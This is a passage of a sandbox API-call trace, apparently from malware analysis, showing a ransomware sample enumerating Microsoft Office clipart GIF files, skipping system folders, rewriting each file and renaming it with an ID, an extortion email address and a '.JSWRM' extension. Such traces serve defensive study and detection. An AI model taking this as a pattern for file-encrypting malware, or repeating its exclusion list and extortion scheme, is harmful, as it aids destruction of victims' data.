CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00164_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00164_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00164_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00164_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00164_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.701] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.701] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.701] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.701] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13254) returned 1 [0073.701] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.701] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x33c0) returned 0x24c1d0 [0073.701] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x33c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x33c0, lpOverlapped=0x0) returned 1 [0073.704] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.704] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x33c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x33c0, lpOverlapped=0x0) returned 1 [0073.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.705] CloseHandle (hObject=0x460) returned 1 [0073.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0073.705] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0073.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0073.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0073.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0073.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.705] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00164_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00164_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0073.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.706] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2186, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00165_.GIF", cAlternateFileName="")) returned 1 [0073.706] lstrcmpiW (lpString1="AG00165_.GIF", lpString2=".") returned 1 [0073.706] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="..") returned 1 [0073.706] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="...") returned 1 [0073.706] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="windows") returned -1 [0073.706] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="recovery") returned -1 [0073.706] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="perflogs") returned -1 [0073.706] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="documents and settings") returned -1 [0073.706] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.706] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="system volume information") returned -1 [0073.706] lstrcmpiW (lpString1="AG00165_.GIF", lpString2="msocache") returned -1 [0073.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0073.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00165_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00165_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00165_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0073.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0073.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00165_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00165_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00165_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0073.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.706] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.706] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.706] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.717] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8582) returned 1 [0073.717] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.717] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2180) returned 0x24c1d0 [0073.717] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2180, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2180, lpOverlapped=0x0) returned 1 [0073.728] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.728] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2180, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2180, lpOverlapped=0x0) returned 1 [0073.728] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.728] CloseHandle (hObject=0x460) returned 1 [0073.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.728] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.728] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0073.729] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0073.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0073.729] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0073.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0073.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.729] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00165_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00165_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0073.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.729] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.729] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x131e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00167_.GIF", cAlternateFileName="")) returned 1 [0073.730] lstrcmpiW (lpString1="AG00167_.GIF", lpString2=".") returned 1 [0073.730] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="..") returned 1 [0073.730] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="...") returned 1 [0073.730] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="windows") returned -1 [0073.730] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="recovery") returned -1 [0073.730] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="perflogs") returned -1 [0073.730] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="documents and settings") returned -1 [0073.730] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.730] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="system volume information") returned -1 [0073.730] lstrcmpiW (lpString1="AG00167_.GIF", lpString2="msocache") returned -1 [0073.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00167_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00167_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00167_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0073.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00167_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00167_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00167_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0073.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.730] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.730] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0073.730] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4894) returned 1 [0073.730] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1310) returned 0x24c1d0 [0073.731] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1310, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x1310, lpOverlapped=0x0) returned 1 [0073.733] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.733] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1310, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x1310, lpOverlapped=0x0) returned 1 [0073.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0073.733] CloseHandle (hObject=0x460) returned 1 [0073.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0073.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0073.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0073.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0073.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0073.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0073.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0073.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0073.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0073.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0073.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0073.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0073.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0073.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0073.733] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00167_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00167_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0073.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0073.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0073.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0073.734] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdbe306f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdbe306f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb3c2ce, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x14ff, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="AG00169_.GIF", cAlternateFileName="")) returned 1 [0073.734] lstrcmpiW (lpString1="AG00169_.GIF", lpString2=".") returned 1 [0073.734] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="..") returned 1 [0073.734] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="...") returned 1 [0073.734] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="windows") returned -1 [0073.734] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="recovery") returned -1 [0073.734] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="perflogs") returned -1 [0073.735] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="documents and settings") returned -1 [0073.735] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0073.735] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="system volume information") returned -1 [0073.735] lstrcmpiW (lpString1="AG00169_.GIF", lpString2="msocache") returned -1 [0073.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0073.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00169_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00169_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00169_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0073.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0073.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00169_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0073.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AG00169_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AG00169_.GIF", lpUsedDefaultChar=0x0) returned 12 [0073.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0073.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0073.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0073.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0073.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0073.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0073.735] CreateFileW 